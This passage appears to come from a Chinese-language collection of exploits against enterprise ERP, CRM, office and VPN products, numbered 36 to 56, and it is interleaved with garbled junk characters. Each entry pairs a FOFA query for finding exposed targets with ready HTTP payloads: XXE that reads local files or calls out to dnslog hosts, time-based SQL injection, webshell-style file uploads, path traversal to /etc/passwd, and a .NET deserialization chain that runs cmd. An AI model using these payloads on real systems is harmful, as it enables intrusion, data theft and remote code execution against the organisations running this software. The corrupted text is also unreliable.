; d$ u/ N% @- [, y# L8 M7 L( FAccept: */*. i; R: }5 ~ k( _
Connection: close6 W' x& g: x! ?7 ]/ C/ o. C: g
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA# i! J# q, j7 A% R$ e! ~. H: E+ O
Content-Length: 1908 k5 r. O; G: Q
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
$ F- i0 k4 j+ |5 @2 m6 ?+ _
' a, \1 o5 b" C3 s--fd28cb44e829ed1c197ec3bc71748df0
/ X, j, J0 C6 C) WContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
6 t& f* _& p) ^' r p4 H
/ Y& ?* b" m* b<%out.println(1111*1111);%>' \7 S% k: p2 j0 a2 _0 }
--fd28cb44e829ed1c197ec3bc71748df0--; k3 X6 W( B. h. c8 ?, u$ z& J8 W; j
( T) x4 N. l( [9 ]
/ b d' s0 t& U/ c5 f8 b
36. 用友NC-Cloud soapFormat XXE/ v7 Y8 |2 s8 j; K* I& ^7 K
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
1 D" o8 S* X( @3 ^: nPOST /uapws/soapFormat.ajax HTTP/1.1
: g# ~8 O" {2 E+ _' O6 v4 hHost: 192.168.40.130:89898 m9 ?! g: `* U& [* h$ _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
V* n" H b& m$ N3 P' H( VContent-Length: 263
" I5 j, T: `9 C& F* yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- h( y- I6 a' C: A. m P; yAccept-Encoding: gzip, deflate
5 ^ R% S" c7 `: B" K" |& Q$ aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( J: N$ h3 Q) {/ K3 h0 S/ W( e% XConnection: close( x3 K1 f$ K W; \2 v+ `
Content-Type: application/x-www-form-urlencoded3 J6 O; v- C3 o0 v
Upgrade-Insecure-Requests: 1* h6 g& D! V/ f
6 a5 R3 w1 z6 m5 hmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a/ Y+ L8 b* |- O& w9 ]! z q
) M9 R7 J: x% J ^+ F0 n7 s
$ D: ?; ], ~$ |& H
37. 用友NC-Cloud IUpdateService XXE8 Y8 g" N: t1 A+ ]3 }* t+ c
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
* t4 ]! n; x4 q3 IPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
- `) V& E: p! c5 q( d$ PHost: 192.168.40.130:8989& d9 @$ f5 P5 {$ U; A. O, t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.362 p% C1 t9 L1 e8 h
Content-Length: 4211 a4 C* i5 |% ~4 H6 V8 B8 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 s2 e7 }2 u2 y! U- ] a0 [Accept-Encoding: gzip, deflate
: s( O7 J( f9 ?' @Accept-Language: zh-CN,zh;q=0.9
' Q+ F+ [. o" L% M* ~9 ?5 KConnection: close
9 P- D/ n3 Z2 k( p; dContent-Type: text/xml;charset=UTF-88 {4 F! \8 o3 k! k9 T- u# y
SOAPAction: urn:getResult: }2 a" g- D3 @- x% V% d" ^: f
Upgrade-Insecure-Requests: 1; o8 G# {4 H$ f" l) H1 _. ]* P
/ `' r0 J/ l& n$ S<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
# C* b4 k4 q9 g3 t<soapenv:Header/>
. q1 D6 W7 m/ S0 X<soapenv:Body>
# T4 y9 \4 M2 V<iup:getResult>
y, a2 S: U" P/ x& P8 C<!--type: string-->
0 Z/ _( P9 {& K; G<iup:string><![CDATA[: j' G L" i2 @/ z) u/ ]
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
# e' i" r( T; v: c* O) Y<xxx/>]]></iup:string>
d, C4 G: [5 `; m</iup:getResult>3 h- l% v" j' G9 d( a
</soapenv:Body>
1 H* B! U* U( O, y$ J. K3 v# `3 |</soapenv:Envelope>1 U4 q- A+ C5 o: B$ k. N/ _1 `
$ } v4 W7 P6 L9 K
8 ?( |: ~; r0 z2 L. S3 o3 _! X% `' ?+ y, t4 N+ q
38. 用友U8 Cloud smartweb2.RPC.d XXE: p/ H0 H6 h# g, H$ _
FOFA:app="用友-U8-Cloud"
: Q1 `8 _( Q% r' _4 aPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
" W% y3 [, F9 B# D6 rHost: 192.168.40.131:8088) h$ o$ ^& g$ g" Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.252 @; l( `/ e% b" N: G3 ]0 S
Content-Length: 260
2 B# ^2 J0 B; y- iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
9 n1 R4 z7 A4 \, p* @1 x) HAccept-Encoding: gzip, deflate
, e6 s) @# R/ j6 J" n4 G# }) N) y4 GAccept-Language: zh-CN,zh;q=0.9: i) X$ [) h* N I" q3 `% z0 h
Connection: close/ ~+ y- q+ X! g u! B2 c9 P9 f
Content-Type: application/x-www-form-urlencoded
' s9 u+ W+ R/ c) W3 X! b3 Q: L6 ^3 P, `' ] v8 e9 ~
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
" T/ y7 @9 Y. z% K$ p- \2 B% U8 U$ H. F; C9 i8 s8 h
' X4 u# l3 Z% z+ E8 |39. 用友U8 Cloud RegisterServlet SQL注入3 x5 r8 O3 N8 }+ C4 [
FOFA:title="u8c"' Y! A9 k1 ~" p+ Q& _9 n0 M# o
POST /servlet/RegisterServlet HTTP/1.1/ d9 k$ N. Z7 N N' {% O' p
Host: 192.168.86.128:8089
1 Z% a0 W- e$ b2 j* pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36- s G/ i2 H4 v0 b: x1 S
Connection: close
% L0 b& Y! [: X p X3 \5 P0 L8 ?! ?Content-Length: 85! J- W6 v- G* m1 k
Accept: */*
# ^* i- Q' x5 R* i0 U) dAccept-Language: en" |- I' w, ]) q
Content-Type: application/x-www-form-urlencoded& [- Y" _, E5 L
X-Forwarded-For: 127.0.0.1- {- S Y% u* b
Accept-Encoding: gzip
' `. Y8 Y& P3 ]- ]1 [3 x/ {
' h9 e0 G0 i, Y4 _usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--7 J1 h& ?! L. S& e/ }$ x
% g% k& [- \% g! N/ A
+ x$ R, U. L+ F4 n" C5 Q
40. 用友U8-Cloud XChangeServlet XXE/ k8 A/ k- N5 p' l) e- Q3 J% _3 T
FOFA:app="用友-U8-Cloud" }1 B7 T: O* L, U& t6 \4 T
POST /service/XChangeServlet HTTP/1.1
q# R6 I# w0 ^! W% v# LHost: x.x.x.x4 u1 Y+ p/ |% N; ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 h# V" Z q1 ~. i3 W3 S
Content-Type: text/xml0 }2 l" d. \' _$ W1 _
Connection: close/ K" U+ W& ~( C, j/ Y0 p" `
0 [! E2 A& F7 U2 f
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
( p" ]2 n4 Z+ w! h- Q6 o/ l
0 i* c1 S/ }2 | H9 N0 N0 E3 Q0 O; S5 d0 F+ K2 l, _% I
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
" {2 s0 c( o) o1 f, kFOFA:app="用友-U8-Cloud"
2 l6 ]/ E! ?8 M! \& a1 p% SGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
9 Q! V' s0 l! [' \Host:
+ q0 K- a, k* ], n; H4 Q8 z' aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. B1 O# Z" D% h9 B8 \: b# K* AContent-Type: application/json
5 [: X, k$ q: `) O& m7 JAccept-Encoding: gzip
5 h/ D+ K% @( g+ IConnection: close) x5 b( i& d/ P
4 X- D0 ~2 ?% M- [- h; `2 q
) G! @8 b1 ]" l o42. 用友GRP-U8 SmartUpload01 文件上传1 c+ y3 j) d5 X. h' o c
FOFA:app="用友-GRP-U8"- p8 @3 m% a) H" F6 T2 X9 u
POST /u8qx/SmartUpload01.jsp HTTP/1.1( h, b7 A H$ a+ M/ V$ U
Host: x.x.x.x
/ H, p' L+ u- KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt4 R- c8 {! q1 L, E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36# T* i2 Y$ u8 I x! T8 w" a. Z
/ O0 J+ w1 V9 r5 j% h; ?$ Q
PAYLOAD' }! n" ?: ]" q1 k4 v. f
2 R0 C& i/ a1 j' [
! k& t( ?: x4 v% S! b7 i8 F
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml' I; Y1 k) n( z% x; Y" D; C
{& V. y5 j6 N x$ T3 F
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
" f$ D. n, @8 x" z" AFOFA:app="用友-GRP-U8"& P1 w( t6 p- m9 n1 z! q( Y$ `# k4 ]
POST /services/userInfoWeb HTTP/1.19 s/ `4 A) g9 i
Host: your-ip9 W$ y; u2 N1 \! N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
4 _9 n# o: W$ I1 i2 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) c6 i* c1 m% Y& V) N$ M/ [Accept-Encoding: gzip, deflate
1 x2 `" [! E/ {' H' B& ~1 @/ fAccept-Language: zh-CN,zh;q=0.9
: S2 _7 k% p4 z/ p- z9 q2 D ZConnection: close" \& i' m9 y7 d$ ~" [
SOAPAction:
# G5 Q# W: j. U7 M, i/ V5 YContent-Type: text/xml;charset=UTF-8$ g* H+ O9 h" q9 g3 C
$ ~3 B' |+ m# T<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">4 Q$ p* B: T1 T( n/ @
<soapenv:Header/>+ X" F# W% N& y v; s
<soapenv:Body>3 Y/ P* t5 j5 `
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">. R9 K4 y" w9 n1 z0 { y; W/ ^5 a4 g7 y
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
7 f- ?; V" ~3 s. ^! i4 t" ^3 c8 S </ser:getUserNameById>) ^- \) C1 A; F" D; d" t7 } ^0 b; i9 @
</soapenv:Body>
! L9 j" X& g H" t" f. Q</soapenv:Envelope>
9 m1 e) M% H8 c$ S; y
' p( ~+ D0 N8 o3 L, }) k( _7 u
6 E& x% s5 r+ i) s9 s% I44. 用友GRP-U8 bx_dj_check.jsp SQL注入
$ F9 b& K. [0 `- L. ?( `& g7 cFOFA:app="用友-GRP-U8"
1 j& W8 m4 M/ x) a# ]8 SGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.16 n# ^4 B- y8 r, p+ G& A# O
Host: your-ip
7 l3 q! [0 f# T4 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
1 m) c* w# @0 V# q( N: `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" ^# n8 e3 ^' CAccept-Encoding: gzip, deflate
' c( [) z6 j$ r1 |/ j q/ k! pAccept-Language: zh-CN,zh;q=0.9
) b+ H6 P$ f; w8 p9 CConnection: close
9 f' u7 K8 ?7 {0 O/ {) h
, Q6 y5 P- @) F, E8 X0 \% m% v( t* H
45. 用友GRP-U8 ufgovbank XXE
0 C) ^% ^8 I, r$ iFOFA:app="用友-GRP-U8". e8 ^4 A$ ^ S% c" D8 ]
POST /ufgovbank HTTP/1.1
4 @$ c3 B b7 LHost: 192.168.40.130:222
% ]7 S& ^' y& EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+ }6 u/ w6 h& U4 ?" Z7 K# XConnection: close
, |& r# [+ r- z+ c# X: F6 dContent-Length: 161
3 ?: D& X/ Q" sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
_) k/ c3 v2 t$ Z: ^9 EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ y- a" _2 k# v3 g& G2 }
Content-Type: application/x-www-form-urlencoded
, [) x& K8 _9 Z5 C2 J& z4 yAccept-Encoding: gzip
9 \& d( X O5 Z( g% R- G6 J! I0 Y- d' F1 D4 y! h, \6 Q6 n7 }
reqData=<?xml version="1.0"?>
" `4 F- R- N2 e" u7 v2 H) d<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
H# w5 ?, k* K( p3 g; \: S+ g" B0 b2 X! W$ x
! H9 @6 x+ k2 _9 X& w5 g46. 用友GRP-U8 sqcxIndex.jsp SQL注入
2 m( @$ X5 ~. u$ z/ _* Z qFOFA:app="用友-GRP-U8"
& H1 _/ F& r" W3 M2 w y2 uGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1- Q4 g- z9 O) B0 D5 t
Host: your-ip
/ d4 M) O% T& ~' _1 J% l0 ]) |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+ l* C; i, {2 n6 p/ ]+ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* q8 l5 O2 Z7 V, h" l0 fAccept-Encoding: gzip, deflate
! e |) {4 T- i( hAccept-Language: zh-CN,zh;q=0.9
. g. C$ l2 b7 i8 fConnection: close
- M2 w) o4 ?: i5 G2 F/ Z( Z) b, E8 v$ P. q
8 I: g# S; H0 b* s0 V4 `7 Y r& D
47. 用友GRP A++Cloud 政府财务云 任意文件读取7 n( G; ?) |! b5 d8 T$ G
FOFA:body="/pf/portal/login/css/fonts/style.css"; C! W1 Y2 E# u+ c5 F3 k
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.13 P }: U8 Z3 c6 S# [$ j1 Y: o
Host: x.x.x.x5 u) ]! P6 t1 X# w* `4 R! X5 z
Cache-Control: max-age=0" N( Q' ~: j, D+ _& w; g
Upgrade-Insecure-Requests: 1
: s) K- E X S. A; uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 S* p" C& O& _# u! j1 g) oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) O, r+ L1 [9 ]9 O+ c9 U
Accept-Encoding: gzip, deflate, br
: }: ]' ]9 g7 E7 H: H) E4 cAccept-Language: zh-CN,zh;q=0.9' Y9 k" y- w9 _: M1 Q
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT, n: y0 Z, P1 r% x( r
Connection: close
# s% M7 `5 j$ }4 R2 N) x' {# r* W# @0 |$ ^- v
4 I2 o9 W# w2 K' D, o/ o1 o! l. x
' v9 s! @4 o; S# D# F* p( Y48. 用友U8 CRM swfupload 任意文件上传
4 R5 d/ O4 ~9 l/ B1 w0 D0 tFOFA:title="用友U8CRM"# v9 L! G2 H$ W* z8 S& Q
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.17 G: {. D9 c: S
Host: your-ip
( h* s4 ?1 ~: ]3 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
d3 M4 s; j. |# HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 j8 L- Y2 m9 i i9 F" `) K0 e1 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* j8 f, T; A4 OAccept-Encoding: gzip, deflate o2 h/ d8 Q' j) ]+ q0 R/ _7 r: ?) l% m/ N
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
5 `' a( u& R) f9 ?$ v------269520967239406871642430066855
+ Q8 [# _- j* Z4 Y+ _. d- Q: rContent-Disposition: form-data; name="file"; filename="s.php"
" d3 k- e0 Z k1231
! p$ P: w7 o& J1 Q" H$ l EContent-Type: application/octet-stream, K* ?1 z+ G. u( p* ]
------269520967239406871642430066855
" E/ c+ J3 o( o& pContent-Disposition: form-data; name="upload"0 S* h f+ C5 Q7 z; b8 L' Y
upload
. x3 z3 ^! p5 d- o------269520967239406871642430066855--
# m! M2 i) y. V! \0 q
- \" ~" m- i# h- p8 ~
' M U+ w8 x& A8 k p7 n6 Z; v49. 用友U8 CRM系统uploadfile.php接口任意文件上传! s3 x4 y* s( P& i% E# X
FOFA:body="用友U8CRM"/ \6 t3 X$ ~' O5 z+ l! S/ O6 Y" e3 u, |
. u5 n4 f8 N& c% {$ U+ o z# uPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1% p1 d o+ m0 S2 ~: Q8 m
Host: x.x.x.x$ V, j- U' S" E: j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% F$ Y9 U( B: P: Y3 ?+ q, r# r1 Z
Content-Length: 329" O1 n: Y' k& r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% {, ^& h9 b% f) ?: B J2 f8 vAccept-Encoding: gzip, deflate
, j0 x- U) R8 U# T6 v DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ j* G( `3 r R; }7 b3 pConnection: close5 Q; z4 x( l: q4 x
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w+ f M4 e& k& a5 ^" K
7 b+ ~' V; ^+ y5 z8 F% i
-----------------------------vvv3wdayqv3yppdxvn3w
9 y* D) x; B/ LContent-Disposition: form-data; name="file"; filename="%s.php ": I3 M) M. a. J. E7 r
Content-Type: application/octet-stream
/ v, J+ p+ e8 G( s3 L. T
2 {$ N) ]7 M8 u! n- Fwersqqmlumloqa
8 D, R L0 G) ]0 c+ f, k. m-----------------------------vvv3wdayqv3yppdxvn3w# z7 t. B$ [' X5 y; e3 E2 j; Q
Content-Disposition: form-data; name="upload"
. }' ]4 s; f% \( u$ }* j) \4 V' E! _/ z$ ], |$ P' w. T+ ]3 K
upload* r* @7 s5 W- d4 q+ X: M% D \
-----------------------------vvv3wdayqv3yppdxvn3w--3 i" G& v9 s% P; o& |5 R
6 g* P9 M5 ?! ^" g! t+ n1 m& M7 `! W# U; Y: P1 c1 m( G
http://x.x.x.x/tmpfile/updB3CB.tmp.php' W# H) @5 E1 I3 N `
( o! \* F3 z- f& l; Y8 M: q50. QDocs Smart School 6.4.1 filterRecords SQL注入
1 }" s3 g; [, z( {5 b: ]; SFOFA:body="close closebtnmodal"1 } J. h: k. q8 s8 X2 r
POST /course/filterRecords/ HTTP/1.1
4 f0 k3 l6 w# u9 P2 oHost: x.x.x.x5 L( y! V8 W# F4 j1 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& f5 P' i. ?6 h4 W% i' D7 GConnection: close( }' [" Z, f# {6 ]$ O
Content-Length: 224
2 Y7 u8 w% R1 x! p* a! TAccept: */*
% h% t% W3 G8 G" f2 @3 gAccept-Language: en
; Q, Q' ^- N& XContent-Type: application/x-www-form-urlencoded
) d( Z" M+ s$ o9 GAccept-Encoding: gzip, r) h9 B; c3 u1 z
5 [' J! J; ]5 u6 D0 q1 s# { P( c; c
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1( d8 N& {) G) U' M5 K+ W$ p4 n6 q) P
- x# Y9 }" @# D2 S8 }# w
9 B) M9 g' E% x, i4 k51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入) [8 A; U+ T6 j/ e$ P
FOFA:app="云时空社会化商业ERP系统"
6 Q. Q/ D) |+ z2 Z! jGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.16 i1 K# K, U s, [
Host: your-ip
& ~$ X) |' z4 V' g% r& QUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36) m0 t. H) `: c |3 v3 a" ]' l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) J" G; y7 `6 R' e' ?
Accept-Encoding: gzip, deflate
2 {/ Y y m3 KAccept-Language: zh-CN,zh;q=0.9" P0 Q( U9 G2 T- Q5 l
Connection: close
* q6 n" @* w9 p+ z3 K S0 ^" q0 |; |. |& B$ J! @
1 d9 P4 z, h- P* d1 N, e8 E
52. 泛微E-Office json_common.php sql注入( d% B8 m+ I5 X; E9 Y. H0 M
FOFA:app="泛微-EOffice"
; N5 J$ l3 [9 e- O* m9 m5 [POST /building/json_common.php HTTP/1.1# [* |6 a- q! f& _; n; M- Y, G) V1 f
Host: 192.168.86.128:8097
6 D1 V) p9 T- AUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& V! i# l" {4 w2 q1 o f5 uConnection: close7 m! c! p- Z6 g: l
Content-Length: 873 I9 R" n! m1 p
Accept: */*# ?3 N( N7 ?. }" Z7 e7 F
Accept-Language: en
& x( e, t4 }: z& E8 NContent-Type: application/x-www-form-urlencoded9 O8 i+ R y3 q% L, P2 O
Accept-Encoding: gzip
# ^* e5 ?* B" K% c5 h: ~( L( U; {- t F! F& k4 M- l
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
" j4 y. B5 H/ n+ c, M
# q' V5 v2 q* H. m9 I& J- u( V# E8 g; ]( s) H, \
53. 迪普 DPTech VPN Service 任意文件上传
k& V- b% Z* `! u" RFOFA:app="DPtech-SSLVPN"
) l% A8 q/ E4 }8 T% f/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd H5 V, t& v6 ^) d8 p
4 z# k5 ~6 Q" B! {$ x
) ^: y/ y( D: ]' ~54. 畅捷通T+ getstorewarehousebystore 远程代码执行
5 b' W' g* M* i! k3 d8 z$ ZFOFA:app="畅捷通-TPlus"3 m1 w7 }) _9 z! T' c* m2 o$ M2 w
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
+ K j8 z* ~; h+ _4 q"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"! h, X3 i' i6 i& x# M. F
" N5 c4 m8 o. R0 c( }* W0 c
# ?$ t1 t- L" s# B完整数据包
" w. c/ L" F6 S1 L; r0 a# [POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1: n- x6 z1 U+ W8 g" Z1 s- x3 K3 W: p
Host: x.x.x.x# I, t* D& S& F3 V$ Q. S
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
! i+ J2 i6 w& Y) r8 b! zContent-Length: 593
/ G! H6 k* ^8 b0 r6 E/ V- G. Z# q
{1 d, e1 p X1 K& \% Y$ e
"storeID":{
; q* I+ c+ D7 @, r$ F' Z& | "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
2 ~: i6 \8 T! U; c, Q7 U "MethodName":"Start",$ E* R% z# m3 U( t/ O# D; W
"ObjectInstance":{
5 L, ]- c& P9 }9 e0 C "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 B0 N& E8 `% S2 d "StartInfo":{
: {) B) y) d1 {' A/ V4 A1 ` "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
: V9 N0 Y5 W7 `! K! p "FileName":"cmd",# N, g" u* P' C$ B" I! ~8 _
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
9 X- V6 o9 L, A5 y$ { }0 L4 f& y* ~* Z4 |
}6 A6 b! W! p4 k' o9 O- z& I% |* s
}9 L+ m; U$ Z+ S( B
}! `9 }1 y+ L5 I% Y. j9 K
! \( G( q, A. V. x& w1 S
% T( R Z8 \/ g! M1 C# v4 c4 G第二步,访问如下url
7 ^( l" w; u) n+ Z, D8 a) T/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
4 c: e$ O" V# q" o J4 S, L' a% C
- U% O* X( Y- o3 ^5 l. f3 U" H0 r" ~0 V6 H$ n2 B8 A
55. 畅捷通T+ getdecallusers信息泄露
1 N% I6 V6 X: u8 K6 ^% G! YFOFA:app="畅捷通-TPlus"& E1 Z( |; n8 J
第一步,通过
7 d( }! O# M3 {; d I/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
" C ?' J f- F; i1 v# Q! c3 A+ ~& t第二步,利用获取到的Cookie请求
6 s6 }/ f- ? U+ R, a/ `, `/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
: G# o: g" j6 ?) T. T4 ~+ o9 ?# ?, q
. m& ^3 i a0 z/ F: b/ s, S8 r56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE& j1 T7 q; F4 _2 y% [, F
FOFA: app="畅捷通-TPlus"
D4 z1 T9 m- ?( ?& gPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.18 z* ]) i, l; E: V- u7 O& H v
Host: x.x.x.x6 w8 E; ?/ B8 h/ N7 I6 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
